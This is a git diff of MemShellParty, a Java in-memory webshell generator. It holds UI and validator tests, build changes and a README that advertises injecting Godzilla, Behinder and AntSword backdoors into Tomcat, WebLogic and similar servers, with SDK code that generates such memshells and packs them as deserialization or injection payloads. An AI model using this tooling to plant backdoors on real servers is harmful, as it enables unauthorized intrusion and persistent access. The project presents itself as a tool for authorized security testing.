class MemShellGeneratorFrameLayoutTest {
|
||||
|
||||
@Test
|
||||
void shouldUseStackedLayoutWithoutSplitPaneAndKeepGenerateButton() throws Exception {
|
||||
Assumptions.assumeFalse(GraphicsEnvironment.isHeadless(), "Headless environment");
|
||||
|
||||
final MemShellGeneratorFrame[] ref = new MemShellGeneratorFrame[1];
|
||||
SwingUtilities.invokeAndWait(new Runnable() {
|
||||
@Override
|
||||
public void run() {
|
||||
ref[0] = new MemShellGeneratorFrame();
|
||||
}
|
||||
});
|
||||
|
||||
try {
|
||||
final JComponent[] contentRef = new JComponent[1];
|
||||
final JButton[] buttonRef = new JButton[1];
|
||||
final Dimension[] minSizeRef = new Dimension[1];
|
||||
SwingUtilities.invokeAndWait(new Runnable() {
|
||||
@Override
|
||||
public void run() {
|
||||
contentRef[0] = ref[0].getMainContentPanel();
|
||||
buttonRef[0] = ref[0].getGenerateButton();
|
||||
minSizeRef[0] = ref[0].getMinimumSize();
|
||||
}
|
||||
});
|
||||
|
||||
assertNotNull(contentRef[0]);
|
||||
assertFalse(contentRef[0] instanceof JSplitPane, "main content should not be a JSplitPane");
|
||||
assertNotNull(buttonRef[0]);
|
||||
assertTrue(buttonRef[0].isEnabled());
|
||||
assertNotNull(minSizeRef[0]);
|
||||
assertTrue(minSizeRef[0].width >= 1180);
|
||||
assertTrue(minSizeRef[0].height >= 900);
|
||||
} finally {
|
||||
SwingUtilities.invokeAndWait(new Runnable() {
|
||||
@Override
|
||||
public void run() {
|
||||
if (ref[0] != null) {
|
||||
ref[0].dispose();
|
||||
}
|
||||
}
|
||||
});
|
||||
}
|
||||
}
|
||||
}
|
||||
+71
@@ -0,0 +1,71 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.DesktopMemShellGenerateResult;
|
||||
import com.reajason.javaweb.desktop.memshell.service.ConfigCatalogService;
|
||||
import com.reajason.javaweb.desktop.memshell.service.GenerationService;
|
||||
import com.reajason.javaweb.desktop.memshell.ui.panel.ResultPanel;
|
||||
import com.reajason.javaweb.desktop.memshell.validation.MemShellValidator;
|
||||
import org.junit.jupiter.api.Test;
|
||||
|
||||
import javax.swing.*;
|
||||
import java.awt.*;
|
||||
|
||||
import static org.junit.jupiter.api.Assertions.*;
|
||||
|
||||
class ResultPanelBasicInfoLayoutTest {
|
||||
|
||||
@Test
|
||||
void shouldUseStructuredNoScrollBasicInfo() throws Exception {
|
||||
MemShellFormController controller = new MemShellFormController(new ConfigCatalogService(), new MemShellValidator());
|
||||
controller.setServer("Tomcat");
|
||||
controller.setShellTool("Godzilla");
|
||||
controller.setShellType("Listener");
|
||||
controller.setPacker("Base64");
|
||||
DesktopMemShellGenerateResult result = new GenerationService().generate(controller.getState().copy());
|
||||
|
||||
final ResultPanel panel = new ResultPanel();
|
||||
SwingUtilities.invokeAndWait(new Runnable() {
|
||||
@Override
|
||||
public void run() {
|
||||
panel.showResult(result);
|
||||
}
|
||||
});
|
||||
|
||||
JComponent basic = panel.getBasicInfoComponent();
|
||||
assertNotNull(basic);
|
||||
assertTrue(basic instanceof JPanel);
|
||||
assertFalse(containsScrollPane(basic), "basic info section should not contain JScrollPane");
|
||||
assertTrue(containsText(panel, "服务类型"));
|
||||
assertTrue(containsText(panel, "内存马功能"));
|
||||
assertTrue(containsText(panel, "注入器类名"));
|
||||
assertTrue(containsText(panel, "内存马类名"));
|
||||
}
|
||||
|
||||
private boolean containsScrollPane(Component c) {
|
||||
if (c instanceof JScrollPane) return true;
|
||||
if (c instanceof Container) {
|
||||
for (Component child : ((Container) c).getComponents()) {
|
||||
if (containsScrollPane(child)) return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
private boolean containsText(Component c, String expected) {
|
||||
if (c instanceof JLabel) {
|
||||
String text = ((JLabel) c).getText();
|
||||
if (text != null && text.contains(expected)) return true;
|
||||
}
|
||||
if (c instanceof JTextField) {
|
||||
String text = ((JTextField) c).getText();
|
||||
if (text != null && text.contains(expected)) return true;
|
||||
}
|
||||
if (c instanceof Container) {
|
||||
for (Component child : ((Container) c).getComponents()) {
|
||||
if (containsText(child, expected)) return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
}
|
||||
+59
@@ -0,0 +1,59 @@
|
||||
package com.reajason.javaweb.desktop.memshell.validation;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
import org.junit.jupiter.api.Test;
|
||||
|
||||
import static org.junit.jupiter.api.Assertions.*;
|
||||
|
||||
class MemShellValidatorTest {
|
||||
private final MemShellValidator validator = new MemShellValidator();
|
||||
|
||||
@Test
|
||||
void shouldRejectGenericUrlPatternWhenRequired() {
|
||||
MemShellFormState s = new MemShellFormState();
|
||||
s.setPackingMethod("Base64");
|
||||
s.setShellType("Servlet");
|
||||
s.setUrlPattern("/*");
|
||||
|
||||
MemShellValidator.Result result = validator.validate(s);
|
||||
assertFalse(result.isValid());
|
||||
assertTrue(result.getFieldErrors().containsKey("urlPattern"));
|
||||
}
|
||||
|
||||
@Test
|
||||
void shouldAllowNoUrlPatternForListener() {
|
||||
MemShellFormState s = new MemShellFormState();
|
||||
s.setPackingMethod("Base64");
|
||||
s.setShellType("Listener");
|
||||
s.setUrlPattern("/*");
|
||||
|
||||
MemShellValidator.Result result = validator.validate(s);
|
||||
assertTrue(result.isValid());
|
||||
}
|
||||
|
||||
@Test
|
||||
void shouldRequireCustomShellBase64ForCustomTool() {
|
||||
MemShellFormState s = new MemShellFormState();
|
||||
s.setPackingMethod("Base64");
|
||||
s.setShellTool("Custom");
|
||||
s.setShellClassBase64("");
|
||||
|
||||
MemShellValidator.Result result = validator.validate(s);
|
||||
assertFalse(result.isValid());
|
||||
assertTrue(result.getFieldErrors().containsKey("shellClassBase64"));
|
||||
}
|
||||
|
||||
@Test
|
||||
void shouldRequireJettyVersionForHandler() {
|
||||
MemShellFormState s = new MemShellFormState();
|
||||
s.setPackingMethod("Base64");
|
||||
s.setServer("Jetty");
|
||||
s.setShellType("Handler");
|
||||
s.setServerVersion("Unknown");
|
||||
s.setUrlPattern("/x");
|
||||
|
||||
MemShellValidator.Result result = validator.validate(s);
|
||||
assertFalse(result.isValid());
|
||||
assertTrue(result.getFieldErrors().containsKey("serverVersion"));
|
||||
}
|
||||
}
|
||||
+332
-34
@@ -1,6 +1,11 @@
|
||||
<h1 align="center">MemShellParty</h1>
|
||||
|
||||
<p align="center"><a href="../README.md">中文</a> | English<br></p>
|
||||
<p align="center">English | <a href="../README.md">中文</a><br></p>
|
||||
<div align="center">
|
||||
|
||||
[](https://github.com/ReaJason/MemShellParty/actions/workflows/test.yaml)
|
||||
[](https://github.com/ReaJason/MemShellParty/actions/workflows/release.yaml)
|
||||
</div>
|
||||
|
||||
|
||||
<div align="center">
|
||||
@@ -12,54 +17,49 @@
|
||||
<div align="center">
|
||||
|
||||
[](https://t.me/memshell)
|
||||
[](https://party.mem.mk)
|
||||
[](https://party.memshell.news)
|
||||
</div>
|
||||
|
||||
> [!WARNING]
|
||||
> This tool is intended only for security researchers, network administrators, and related technical personnel for authorized security testing, vulnerability assessment, and security auditing. Using this tool for any unauthorized network attack or penetration test is illegal, and users must bear the corresponding legal responsibility.
|
||||
> This tool is intended only for security researchers, network administrators, and related technical personnel for authorized security testing, vulnerability assessment, and security auditing purposes. Using this tool for any unauthorized network attacks or penetration testing activities is illegal, and users are solely responsible for any resulting legal consequences.
|
||||
|
||||
> [!TIP]
|
||||
> Since I mainly work on security product development and do not have practical offensive experience, please feel free to open an issue or join the Telegram group if you have questions about usage, implementation, or adaptation requests. You are welcome to learn and exchange ideas together.
|
||||
> As I primarily focus on security product development and lack extensive real-world combat experience, please feel free to raise an issue or join the [Telegram group](https://t.me/memshell) if you have questions about usage, implementation, or adaptation requests. Let's learn and exchange ideas together!
|
||||
|
||||
MemShellParty is a fast memshell generation tool focused on mainstream web middleware. It is designed to simplify the workflow of security researchers and red team members, improving offensive and defensive efficiency.
|
||||
MemShellParty is a self-hosted, visual platform for one-click generation of java memshell for common middleware and frameworks. It also aims to be a comprehensive learning platform for java memshell. In an era full of wheels, it's time to build the car and accelerate together!
|
||||
|
||||
<p align="center">
|
||||
<img src="../assets/normal_memshell.png" alt="normal_memshell" width="24%">
|
||||
<img src="../assets/agent_memshell.png" alt="agent_memshell" width="24%">
|
||||
<img src="../assets/dnslog_probe.png" alt="dnslog_probe" width="24%">
|
||||
<img src="../assets/about_page.png" alt="about_page" width="24%">
|
||||
</p>
|
||||
What you can learn or try from this project:
|
||||
|
||||
1. Learn to write java memshell for common middleware and frameworks.
|
||||
2. Learn to use [Testcontainers](https://testcontainers.com/) for Java application integration testing.
|
||||
3. Learn to use GitHub Actions for CI/CD, write CHANGELOG, and automate Release publications via CI.
|
||||
4. Try using [Byte Buddy](https://bytebuddy.net/) to generate classes and write Agents.
|
||||
5. Try using Gradle to build Java projects (using platform for dependency version management, toolchain to compile JDK 6 source code even in a JDK 17 environment within the root project).
|
||||
|
||||

|
||||
|
||||

|
||||
|
||||
## Key Features
|
||||
|
||||
- **Non-intrusive**: Generated memshells do not affect normal target middleware traffic, even when more than a dozen different memshells are injected at the same time.
|
||||
- **Strong compatibility**: Covers common middleware and frameworks in offensive and defensive scenarios, and supports JDK6 through JDK21.
|
||||
- **High availability**: A comprehensive automated test matrix has been built for all supported middleware and frameworks, ensuring each generated payload has high usability and stability while reducing uncertainty in real-world use.
|
||||
- **Extremely lightweight**: Through deeply optimized bytecode generation strategies, MemShellParty greatly reduces memshell size compared with traditional tools such as JMG. Regular memshells are reduced by **30%**, and Agent memshells are reduced by **80%** using ASM.
|
||||
- **One-click simplicity**: Built-in payload generation is provided for common vulnerabilities such as expression injection, deserialization, and SSTI. The system automatically configures Java module restriction bypasses and dynamically generates the optimal attack payload, enabling one-click generation for common vulnerability payloads.
|
||||
- **High flexibility**: Natively supports common memshell capabilities such as Godzilla, Behinder, AntSword, Suo5, and NeoreGeorg. With the highly flexible custom memshell upload feature, any customized payload can be integrated into the MemShellParty generation system to build an attack platform that best fits your tactical needs.
|
||||
- Non-Intrusive: Generated memshell do not interfere with the normal traffic of the target middleware, even when multiple different shells are injected simultaneously.
|
||||
- High Availability: Comes with comprehensive [CI integration tests](https://github.com/ReaJason/MemShellParty/actions/workflows/test.yaml)
|
||||
- Minimal Size: Strives to minimize memshell size for efficient transfer.
|
||||
- Strong Compatibility: Covers common middleware and frameworks encountered in offensive and defensive scenarios.
|
||||
|
||||
## Quick Start
|
||||
|
||||
### Read Before Use
|
||||
### Online Preview
|
||||
|
||||
[Compatibility](https://party.mem.mk/ui/docs/compatibility) helps you understand MemShellParty's adaptation status for each service, so you can choose the right service type for different applications.
|
||||
> Suitable for users who just want to try it out. Please use with caution on public services, as generated memshell might potentially contain backdoors if the service is compromised.
|
||||
|
||||
The probe memshell maps detected service types one by one. The detected service type is the service type that can be used to generate memshells. This is not necessarily the middleware type. For example, Apusic10 is detected as GlassFish because it is developed based on GlassFish.
|
||||
|
||||
### Online Site
|
||||
|
||||
> Only for users who want to try it out. Please use caution with other publicly exposed services, as generated memshells may contain backdoors.
|
||||
|
||||
You can access the master branch at [https://party.mem.mk](https://party.mem.mk). The latest image is automatically deployed for each release.
|
||||
|
||||
For features under development, you can try the dev branch early at [https://dev-party.mem.mk](https://dev-party.mem.mk).
|
||||
Access directly at [https://party.memshell.news](https://party.memshell.news). The latest image is automatically deployed with each release.
|
||||
|
||||
### Local Deployment (Recommended)
|
||||
|
||||
> Suitable for quick internal network or local deployment. Starting the service directly with Docker is fast and convenient.
|
||||
> Ideal for quick deployment on internal networks or local machines. Using Docker is fast and convenient.
|
||||
|
||||
After deploying with Docker, access http://127.0.0.1:8080
|
||||
After deploying with Docker, access the service at http://127.0.0.1:8080
|
||||
|
||||
```bash
|
||||
# Pull the latest image from Docker Hub
|
||||
@@ -68,14 +68,312 @@ docker run --pull=always --rm -it -d -p 8080:8080 --name memshell-party reajason
|
||||
# Pull the latest image from Github Container Registry
|
||||
docker run --pull=always --rm -it -d -p 8080:8080 --name memshell-party ghcr.io/reajason/memshell-party:latest
|
||||
|
||||
# Poor network quality? Use the Nanjing University Github Container Registry mirror
|
||||
# If network quality is poor, use the Nanjing University Github Container Registry mirror
|
||||
docker run --pull=always --rm -it -d -p 8080:8080 --name memshell-party ghcr.nju.edu.cn/reajason/memshell-party:latest
|
||||
```
|
||||
|
||||
## Special Thanks
|
||||
The image is stateless. To update to the latest version, simply remove the old container and create a new one:
|
||||
|
||||
```bash
|
||||
# Remove the previously deployed container
|
||||
docker rm -f memshell-party
|
||||
|
||||
# Use the previous deployment command to redeploy (it will automatically pull the latest image)
|
||||
docker run --pull=always --rm -it -d -p 8080:8080 --name memshell-party reajason/memshell-party:latest
|
||||
```
|
||||
|
||||
### SDK Integration into Existing Tools
|
||||
|
||||
> Suitable for integrating memshell payload generation into your existing tools. Supports JDK 8 and above (since v1.7.0).
|
||||
|
||||
1. Add the dependency using Maven or Gradle:
|
||||
|
||||
```xml
|
||||
<!-- Maven Repo-->
|
||||
<dependency>
|
||||
<groupId>io.github.reajason</groupId>
|
||||
<artifactId>generator</artifactId>
|
||||
<version>1.7.0</version>
|
||||
</dependency>
|
||||
```
|
||||
|
||||
```groovy
|
||||
// Gradle Repo
|
||||
implementation 'io.github.reajason:generator:1.7.0'
|
||||
```
|
||||
|
||||
2. Example1: Generate a Tomcat Godzilla Filter memory shell:
|
||||
|
||||
```java
|
||||
ShellConfig shellConfig = ShellConfig.builder()
|
||||
.server(Server.Tomcat)
|
||||
.shellTool(ShellTool.Godzilla)
|
||||
.shellType(ShellType.FILTER)
|
||||
.shrink(true) // Shrink bytecode size
|
||||
.debug(false) // Disable debug mode
|
||||
.build();
|
||||
|
||||
InjectorConfig injectorConfig = InjectorConfig.builder()
|
||||
// .urlPattern("/*") // Custom urlPattern, defaults to /*
|
||||
// .shellClassName("com.example.memshell.GodzillaShell") // Custom shell class name, random if empty
|
||||
// .injectorClassName("com.example.memshell.GodzillaInjector") // Custom injector class name, random if empty
|
||||
.build();
|
||||
|
||||
GodzillaConfig godzillaConfig = GodzillaConfig.builder()
|
||||
// .pass("pass")
|
||||
// .key("key")
|
||||
// .headerName("User-Agent")
|
||||
// .headerValue("test")
|
||||
.build();
|
||||
|
||||
GenerateResult result = MemShellGenerator.generate(shellConfig, injectorConfig, godzillaConfig);
|
||||
|
||||
System.out.println("Injector Class Name: "+result.getInjectorClassName());
|
||||
System.out.println("MemShell Class Name: "+result.getShellClassName());
|
||||
|
||||
System.out.println(result.getShellConfig());
|
||||
System.out.println(result.getShellToolConfig());
|
||||
|
||||
System.out.println("Base64 Packed: "+Packers.Base64.getInstance().pack(result));
|
||||
System.out.println("ScriptEngine Packed: "+Packers.ScriptEngine.getInstance().pack(result));
|
||||
```
|
||||
3. Example2: Generate a Tomcat Godzilla AgentFilterChain memory shell (Agent type):
|
||||
```java
|
||||
ShellConfig shellConfig = ShellConfig.builder()
|
||||
.server(Server.Tomcat)
|
||||
.shellTool(ShellTool.Godzilla)
|
||||
.shellType(ShellType.AGENT_FILTER_CHAIN)
|
||||
.shrink(true) // Shrink bytecode size
|
||||
.debug(false) // Disable debug mode
|
||||
.build();
|
||||
|
||||
InjectorConfig injectorConfig = InjectorConfig.builder()
|
||||
// .urlPattern("/*") // Custom urlPattern, defaults to /*
|
||||
// .shellClassName("com.example.memshell.GodzillaShell") // Custom shell class name, random if empty
|
||||
// .injectorClassName("com.example.memshell.GodzillaInjector") // Custom injector class name, random if empty
|
||||
.build();
|
||||
|
||||
GodzillaConfig godzillaConfig = GodzillaConfig.builder()
|
||||
// .pass("pass")
|
||||
// .key("key")
|
||||
// .headerName("User-Agent")
|
||||
// .headerValue("test")
|
||||
.build();
|
||||
|
||||
GenerateResult result = MemShellGenerator.generate(shellConfig, injectorConfig, godzillaConfig);
|
||||
|
||||
System.out.println("Injector Class Name: " + result.getInjectorClassName());
|
||||
System.out.println("MemShell Class Name: " + result.getShellClassName());
|
||||
|
||||
System.out.println(result.getShellConfig());
|
||||
System.out.println(result.getShellToolConfig());
|
||||
|
||||
byte[] agentJarBytes = ((JarPacker) Packers.AgentJar.getInstance()).packBytes(result);
|
||||
Files.write(Paths.get("agent.jar"), agentJarBytes);
|
||||
```
|
||||
4. For a unified generation interface example, refer to [GeneratorController.java](../boot/src/main/java/com/reajason/javaweb/boot/controller/GeneratorController.java)
|
||||
|
||||
## Compatibility
|
||||
|
||||
Compatible with Java6 ~ Java8, Java9, Java11, Java17, Java21
|
||||
|
||||
### Middleware and Frameworks
|
||||
|
||||
| Tomcat(5 ~ 11) | Jetty(6 ~ 11) | GlassFish(3 ~ 7) | Payara(5 ~ 6) |
|
||||
|----------------------|------------------------|----------------------|----------------------|
|
||||
| Servlet | Servlet | Filter | Filter |
|
||||
| Filter | Filter | Listener | Listener |
|
||||
| Listener | Listener | Valve | Valve |
|
||||
| Valve | ServletHandler - Agent | FilterChain - Agent | FilterChain - Agent |
|
||||
| ProxyValve | | | |
|
||||
| FilterChain - Agent | | ContextValve - Agent | ContextValve - Agent |
|
||||
| ContextValve - Agent | | | |
|
||||
|
||||
| Resin(3 ~ 4) | SpringMVC | SpringWebFlux | XXL-JOB |
|
||||
|---------------------|--------------------------|-----------------|--------------|
|
||||
| Servlet | Interceptor | WebFilter | NettyHandler |
|
||||
| Filter | ControllerHandler | HandlerMethod | |
|
||||
| Listener | FrameworkServlet - Agent | HandlerFunction | |
|
||||
| FilterChain - Agent | | NettyHandler | |
|
||||
|
||||
| JBossAS(4 ~ 7) | JBossEAP(6 ~ 7) | WildFly(9 ~ 30) | Undertow |
|
||||
|----------------------|----------------------------|------------------------|------------------------|
|
||||
| Filter | Filter | Servlet | Servlet |
|
||||
| Listener | Listener | Filter | Filter |
|
||||
| Valve | Valve(6) | Listener | Listener |
|
||||
| ProxyValve | | | |
|
||||
| FilterChain - Agent | FilterChain - Agent (6) | ServletHandler - Agent | ServletHandler - Agent |
|
||||
| ContextValve - Agent | ContextValve - Agent (6) | | |
|
||||
| | ServletHandler - Agent (7) | | |
|
||||
|
||||
| WebSphere(7 ~ 9) | WebLogic (10.3.6 ~ 14) |
|
||||
|-----------------------|-------------------------|
|
||||
| Servlet | Servlet |
|
||||
| Filter | Filter |
|
||||
| Listener | Listener |
|
||||
| FilterManager - Agent | ServletContext - Agent |
|
||||
|
||||
| BES(9.5.x) | TongWeb(6 ~ 8) | InforSuite AS (9 ~ 10) |
|
||||
|----------------------|----------------------|------------------------|
|
||||
| Filter | Filter | Filter |
|
||||
| Listener | Listener | Listener |
|
||||
| Valve | Valve | Valve |
|
||||
| FilterChain - Agent | FilterChain - Agent | FilterChain - Agent |
|
||||
| ContextValve - Agent | ContextValve - Agent | ContextValve - Agent |
|
||||
|
||||
| Apusic AS (9 ~ 10) | Primeton(6.5) |
|
||||
|---------------------|----------------------|
|
||||
| Servlet | Filter |
|
||||
| Filter | Listener |
|
||||
| Listener | Valve |
|
||||
| FilterChain - Agent | FilterChain - Agent |
|
||||
| | ContextValve - Agent |
|
||||
|
||||
### MemShell Functionality
|
||||
|
||||
- [x] [Godzilla](https://github.com/BeichenDream/Godzilla)
|
||||
- [x] [Behinder](https://github.com/rebeyond/Behinder)
|
||||
- [x] Command Execution
|
||||
- [x] [Suo5](https://github.com/zema1/suo5)
|
||||
- [x] [AntSword](https://github.com/AntSwordProject/antSword)
|
||||
- [x] [Neo-reGeorg](https://github.com/L-codes/Neo-reGeorg)
|
||||
- [x] Custom
|
||||
|
||||
### Packaging Methods
|
||||
|
||||
- [x] BASE64
|
||||
- [x] GZIP BASE64
|
||||
- [x] JSP
|
||||
- [x] JSPX
|
||||
- [x] JAR
|
||||
- [x] BCEL
|
||||
- [x] Built-in ScriptEngine, Rhino ScriptEngine
|
||||
- [x] EL、SpEL、OGNL、Aviator、MVEL、JEXL、Groovy、JXPath、BeanShell
|
||||
- [x] Velocity、Freemarker、JinJava
|
||||
- [x] Native Deserialization(CB and CC)
|
||||
- [x] Agent
|
||||
- [x] XXL-JOB Executor
|
||||
- [x] Hessian, Hessian2 Deserialization (XSLT gadget chain)
|
||||
- [ ] JNDI
|
||||
- [ ] JDBC Connection
|
||||
- [ ] Other common deserialization
|
||||
|
||||
## Local Build
|
||||
|
||||
### Building from Source Code
|
||||
|
||||
> Suitable for developers who want to modify the code. Clone the repository locally and build the frontend and backend projects.
|
||||
|
||||
First, you need to download and install [bun](https://bun.sh/), a tool for building the frontend service.
|
||||
|
||||
1. Clone the project using Git:
|
||||
```bash
|
||||
git clone https://github.com/ReaJason/MemShellParty.git
|
||||
```
|
||||
2. Build the frontend project. After the build finishes, static resources will be automatically moved to the Spring Boot module.
|
||||
```bash
|
||||
cd MemShellParty/web
|
||||
|
||||
bun install
|
||||
|
||||
bun run build
|
||||
```
|
||||
3. Build the backend project. Ensure you are using a JDK 17 environment.
|
||||
```bash
|
||||
cd MemShellParty/boot
|
||||
|
||||
./gradlew :boot:bootjar -x test
|
||||
```
|
||||
|
||||
After building, you can directly run the JAR file located at `MemShellParty/boot/build/libs/boot-*.jar` (the exact version might vary).
|
||||
|
||||
```bash
|
||||
cd MemShellParty/boot
|
||||
|
||||
java -jar \
|
||||
--add-opens=java.base/java.util=ALL-UNNAMED \
|
||||
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
|
||||
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
|
||||
build/libs/boot-1.0.0.jar
|
||||
```
|
||||
|
||||
Alternatively, you can build a Docker container from the built artifacts:
|
||||
|
||||
```bash
|
||||
cd MemShellParty/boot
|
||||
|
||||
docker buildx build -t memshell-party:latest . --load
|
||||
|
||||
docker run -it -d --name memshell-party -p 8080:8080 memshell-party:latest
|
||||
```
|
||||
|
||||
### Building with Dockerfile Directly
|
||||
|
||||
> Suitable for users who want to build with custom access paths, for example, when using NGINX as a reverse proxy ([#44](https://github.com/ReaJason/MemShellParty/issues/44)).
|
||||
|
||||
Download the [Dockerfile](../Dockerfile) from the project root.
|
||||
|
||||
- VERSION: Version information (arbitrary, suggest using the latest tag; used for frontend display).
|
||||
- ROUTE_ROOT_PATH: Frontend root route configuration (e.g., /memshell-party).
|
||||
- CONTEXT_PATH: Backend access prefix (e.g., /memshell-party).
|
||||
|
||||
```bash
|
||||
# Basic build (defaults to root path "/")
|
||||
docker buildx build \
|
||||
--build-arg VERSION=1.7.0 \
|
||||
-t memshell-party:latest . --load
|
||||
|
||||
# Run the basic image, access at http://127.0.0.1:8080
|
||||
docker run -it -d -p 8080:8080 memshell-party:latest
|
||||
|
||||
# Build with custom access path (e.g., /memshell-party)
|
||||
docker buildx build \
|
||||
--build-arg VERSION=1.7.0 \
|
||||
--build-arg ROUTE_ROOT_PATH=/memshell-party \
|
||||
--build-arg CONTEXT_PATH=/memshell-party \
|
||||
-t memshell-party:latest . --load
|
||||
|
||||
# Run the custom path image, access at http://127.0.0.1:8080/memshell-party
|
||||
docker run -it -p 8080:8080 \
|
||||
-e BOOT_OPTS=--server.servlet.context-path=/memshell-party \
|
||||
memshell-party:latest
|
||||
```
|
||||
|
||||
If you need to use NGINX as a reverse proxy, first build the container with a custom access path. Then configure NGINX similar to the following:
|
||||
|
||||
Ensure that the `location /memshell-party`、`ROUTE_ROOT_PATH=/memshell-party`、`CONTEXT_PATH=/memshell-party` and
|
||||
`BOOT_OPTS=--server.servlet.context-path=/memshell-party` all use the same path.
|
||||
|
||||
```text
|
||||
location /memshell-party {
|
||||
proxy_pass http://127.0.0.1:8080;
|
||||
proxy_set_header Host $http_host;
|
||||
proxy_set_header X-Forwarded-By $server_addr:$server_port;
|
||||
proxy_set_header X-Forwarded-For $remote_addr;
|
||||
proxy_http_version 1.1;
|
||||
proxy_connect_timeout 3s;
|
||||
proxy_read_timeout 300s;
|
||||
proxy_send_timeout 300s;
|
||||
proxy_buffer_size 16k;
|
||||
proxy_buffers 8 64k;
|
||||
proxy_busy_buffers_size 128k;
|
||||
}
|
||||
```
|
||||
|
||||
## Contribute
|
||||
|
||||
> Any feedback or issue discussion you provide is a contribution to this project.
|
||||
|
||||
> It will be so nice if you want to contribute. 🎉
|
||||
|
||||
1. If you have strong Docker environment building skills, consider adding integration test cases related to specific CVEs.
|
||||
2. If you are skilled in writing memory shells, try adding support for a new type or target.
|
||||
3. If you have extensive practical experience, feel free to open issues with suggestions or improvements.
|
||||
|
||||
For project structure, build processes, and compilation details, please refer to [CONTRIBUTING.md](../CONTRIBUTING.md)。
|
||||
|
||||
## Thanks
|
||||
|
||||
- [vulhub/java-chains](https://github.com/vulhub/java-chains)
|
||||
- [pen4uin/java-memshell-generator](https://github.com/pen4uin/java-memshell-generator)
|
||||
- [pen4uin/java-echo-generator](https://github.com/pen4uin/java-echo-generator)
|
||||
|
||||
### Let's start the party 🎉
|
||||
|
||||
@@ -29,6 +29,7 @@ tasks.test {
|
||||
dependencies {
|
||||
implementation(project(":memshell-party-common"))
|
||||
implementation(project(":packer"))
|
||||
implementation(project(":thirdparty:thirdparty-tomcat"))
|
||||
api(libs.byte.buddy)
|
||||
implementation(libs.asm.commons)
|
||||
implementation(libs.javax.websocket.api)
|
||||
@@ -37,12 +38,10 @@ dependencies {
|
||||
implementation(libs.jakarta.servlet.api)
|
||||
implementation(libs.spring.webmvc)
|
||||
implementation(libs.spring.webflux)
|
||||
implementation(libs.tomcat.embed.core)
|
||||
implementation(libs.reactor.netty.core)
|
||||
implementation(libs.alibaba.dubbo)
|
||||
implementation(libs.apache.dubbo)
|
||||
implementation(libs.jackson.annotations)
|
||||
implementation(libs.bundles.jna)
|
||||
implementation("org.apache.dubbo:dubbo:2.7.8")
|
||||
|
||||
testImplementation(libs.junit.jupiter)
|
||||
testImplementation(libs.hamcrest)
|
||||
|
||||
@@ -7,11 +7,9 @@ package com.reajason.javaweb;
|
||||
public class Server {
|
||||
public static final String Tomcat = "Tomcat";
|
||||
public static final String Jetty = "Jetty";
|
||||
public static final String Jetty5 = "Jetty5";
|
||||
public static final String Undertow = "Undertow";
|
||||
public static final String JBoss = "JBoss";
|
||||
public static final String Resin = "Resin";
|
||||
public static final String Resin2 = "Resin2";
|
||||
public static final String WebLogic = "WebLogic";
|
||||
public static final String WebSphere = "WebSphere";
|
||||
public static final String GlassFish = "GlassFish";
|
||||
@@ -22,6 +20,6 @@ public class Server {
|
||||
public static final String SpringWebMvc = "SpringWebMvc";
|
||||
public static final String SpringWebFlux = "SpringWebFlux";
|
||||
public static final String XXLJOB = "XXLJOB";
|
||||
public static final String Struts2 = "Struts2";
|
||||
public static final String Struct2 = "Struct2";
|
||||
public static final String Dubbo = "Dubbo";
|
||||
}
|
||||
|
||||
@@ -63,7 +63,7 @@ public class MemShellGenerator {
|
||||
|
||||
byte[] shellBytes = ShellToolFactory.generateBytes(shellConfig, shellToolConfig);
|
||||
|
||||
if (shellConfig.getShellType().endsWith(ShellType.DUBBO_SERVICE)) {
|
||||
if (ShellType.DUBBO_SERVICE.equals(shellConfig.getShellType())) {
|
||||
String packageName = CommonUtil.getPackageName(shellToolConfig.getShellClassName());
|
||||
String simpleName = CommonUtil.getSimpleName(shellToolConfig.getShellClassName());
|
||||
String interfaceName = packageName + ".I" + simpleName;
|
||||
|
||||
@@ -32,6 +32,8 @@ public class MemShellResult {
|
||||
private transient Map<String, byte[]> injectorInnerClassBytes;
|
||||
private long injectorSize;
|
||||
private String injectorBytesBase64Str;
|
||||
private String injectorHelperBytesBase64Str;
|
||||
private long injectorHelperSize;
|
||||
private ShellConfig shellConfig;
|
||||
private ShellToolConfig shellToolConfig;
|
||||
private InjectorConfig injectorConfig;
|
||||
@@ -46,13 +48,20 @@ public class MemShellResult {
|
||||
injectorBytesBase64Str = Base64.getEncoder().encodeToString(injectorBytes);
|
||||
injectorSize = injectorBytes.length;
|
||||
}
|
||||
if (injectorConfig != null && injectorConfig.getHelperClassBytes() != null) {
|
||||
injectorHelperBytesBase64Str = Base64.getEncoder().encodeToString(injectorConfig.getHelperClassBytes());
|
||||
injectorHelperSize = injectorConfig.getHelperClassBytes().length;
|
||||
|
||||
}
|
||||
return new MemShellResult(shellClassName, shellBytes, shellSize, shellBytesBase64Str,
|
||||
injectorClassName, injectorBytes, injectorInnerClassBytes, injectorSize, injectorBytesBase64Str, shellConfig, shellToolConfig, injectorConfig);
|
||||
injectorClassName, injectorBytes, injectorInnerClassBytes, injectorSize,
|
||||
injectorBytesBase64Str, injectorHelperBytesBase64Str, injectorHelperSize,
|
||||
shellConfig, shellToolConfig, injectorConfig);
|
||||
}
|
||||
}
|
||||
|
||||
public JarPackerConfig toJarPackerConfig() {
|
||||
JarPackerConfig jarPackerConfig = new JarPackerConfig();
|
||||
JarPackerConfig<?> jarPackerConfig = new JarPackerConfig<>();
|
||||
jarPackerConfig.setMainClassName(injectorClassName);
|
||||
Map<String, byte[]> bytes = new HashMap<>();
|
||||
bytes.put(shellClassName, shellBytes);
|
||||
@@ -65,7 +74,7 @@ public class MemShellResult {
|
||||
}
|
||||
|
||||
public ClassPackerConfig toClassPackerConfig() {
|
||||
ClassPackerConfig classPackerConfig = new ClassPackerConfig();
|
||||
ClassPackerConfig<?> classPackerConfig = new ClassPackerConfig<>();
|
||||
classPackerConfig.setClassName(injectorClassName);
|
||||
classPackerConfig.setClassBytes(injectorBytes);
|
||||
classPackerConfig.setClassBytesBase64Str(injectorBytesBase64Str);
|
||||
|
||||
@@ -33,11 +33,9 @@ public class ServerFactory {
|
||||
